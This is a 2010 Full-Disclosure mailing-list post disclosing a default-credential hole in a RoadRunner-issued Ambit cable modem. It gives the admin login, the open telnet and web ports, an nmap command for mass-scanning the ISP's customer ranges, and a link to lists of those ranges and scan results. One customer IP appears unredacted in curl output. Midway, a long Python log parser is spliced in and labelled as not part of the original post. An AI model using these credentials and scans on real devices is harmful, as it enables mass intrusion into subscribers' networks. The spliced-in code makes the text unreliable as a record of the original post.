Message-ID: <20100810211539.GA29566@harryy.us>
Date: Tue, 10 Aug 2010 21:15:39 +0000
From: Harry Strongburg <harry.fd@...ry.lu>
To: full-disclosure@...ts.grok.org.uk
Subject: RoadRunner Ambit U10C019 CableModem Exploit

Hello. This is the introduction to a large-scale RoadRunner Cable-Router exploit on the Ambit U10C019 CableModem.

Basically, the Cable Router that RoadRunner/TimeWarner gives to its customers by default:
 1) Allows for remote login with user: admin, password: cableroot.
 2) Allows remote access by default. (port 64623 for telnet, port 64680 for webui)

Devices affected:
Ambit U10C019 CableModem
Boot code revision : 2.1.6d
Hardware revision : 4.10
Software revision : 5.66.1026
Software build time : Feb 26 2009 12:53:26


Example for scanning the RoadRunner IP ranges:
nmap -PN -T5 --open -p64623 -n --max-retries 0 --host-timeout 5s -iL rr.lst >> nmap.log; grep -B 3 open nmap.log > open.log
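The `grep -B 3 open` step above relies on the port line always sitting a fixed number of lines below the host line, which is not guaranteed across nmap versions and output variants. The following is an added example, not part of the original post: a small parser for nmap's normal output that tracks the current host explicitly and reports which hosts answer on the two management ports named in the post (64623/tcp telnet, 64680/tcp web UI), written from the point of view of an operator auditing address blocks they are responsible for. The sample log is constructed here using RFC 5737 documentation addresses; the function and variable names are this example's own.

```python
import re
from collections import defaultdict

# Header lines that start a per-host section in nmap's normal output.
# Recent versions print "Nmap scan report for host" (optionally "name (ip)");
# nmap 4.x printed "Interesting ports on host:". Both forms are accepted.
HOST_RE = re.compile(
    r"^(?:Nmap scan report for|Interesting ports on)\s+"
    r"(?P<name>\S+?)(?:\s+\((?P<ip>[^)]+)\))?:?\s*$"
)
# Port lines look like "64623/tcp open  unknown".
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>open|open\|filtered|closed|filtered)\b"
)

# Management ports reported in the post: telnet and the web UI.
MANAGEMENT_PORTS = (64623, 64680)

# Constructed sample log (not real scan output); 192.0.2.0/24 is reserved for
# documentation, so none of these addresses belong to a real device.
SAMPLE_NMAP_LOG = """\
Starting Nmap 5.21 ( http://nmap.org ) at 2010-08-10 21:00 UTC
Nmap scan report for 192.0.2.10
Host is up (0.031s latency).

PORT      STATE SERVICE
64623/tcp open  unknown

Nmap scan report for modem.example (192.0.2.11)
Host is up (0.044s latency).

PORT      STATE SERVICE
64623/tcp closed unknown
64680/tcp open  unknown

Interesting ports on 192.0.2.12:
PORT      STATE SERVICE
64623/tcp open  unknown
64680/tcp open  unknown

Nmap scan report for 192.0.2.13
Host is up.

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 4 IP addresses (4 hosts up) scanned in 2.10 seconds
"""


def parse_open_ports(text):
    """Return {host: [open_port, ...]} for every host in nmap normal output.

    The host is taken from the most recent header line, so the distance
    between the header and the port line does not matter. Only ports in
    state "open" are recorded; closed/filtered lines are skipped.
    """
    hosts = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            # Prefer the IP when nmap printed "name (ip)".
            current = m.group("ip") or m.group("name")
            continue
        m = PORT_RE.match(line)
        if m and current and m.group("state") == "open":
            hosts[current].append(int(m.group("port")))
    return dict(hosts)


def exposed_management_hosts(text, ports=MANAGEMENT_PORTS):
    """Sorted list of hosts with at least one management port open."""
    wanted = set(ports)
    return sorted(
        host for host, open_ports in parse_open_ports(text).items()
        if wanted & set(open_ports)
    )


if __name__ == "__main__":
    for host in exposed_management_hosts(SAMPLE_NMAP_LOG):
        print(host)
```

To use it on a real log, read `nmap.log` into a string and pass it to `exposed_management_hosts`; hosts whose only open port is something else (such as 22/tcp in the sample) are left out of the list.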

Torrent of files related to this disclosure at https://thepiratebay.org/torrent/5753559/
This archive contains:
 rr.lst - list of RoadRunner CIDR blocks.
 open-cleaned.txt - my initial scan of the ranges to see a rough estimate of the number of affected devices.
 readme.txt - this file.
(You can also DDL it at http://harry.lu/files/torrents/rr-ambit-fd.tar.gz; I prefer you use the torrent option to save my bandwidth).


This hole appears to have been patched with a firmware update:

$ telnet device.ip 64623
Trying device.ip...
Connected to device.ip.
Escape character is '^]'.
Connection closed by foreign host.

$ curl -vvv 24.172.42.225:64680
* About to connect() to device.ip port 64680 (#0)
*   Trying device.ip... connected
* Connected to device.ip (device.ip) port 64680 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.21.0 (x86_64-unknown-linux-gnu) libcurl/7.21.0 OpenSSL/1.0.0a zlib/1.2.5
> Host: device.ip:64680
> Accept: */*
> 
* Empty reply from server
* Connection #0 to host device.ip left intact
curl: (52) Empty reply from server
* Closing connection #0


I use the phrase "appears", as I am unsure. Michael O'Donnel at Road Runner, who is the Chief of Security (if I recall correctly), said he would work on it. Later, I did not receive much more contact in the *8 weeks* after I contacted them. Recent attempts to contact Michael via leaving a voicemail got no reply. (Maybe I shouldn't have been so polite in my disclosure to them, if they don't even bother to contact me when it's fixed?)



Keep safe.
--
Harry Strongburg <harry.fd at harry.lu>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
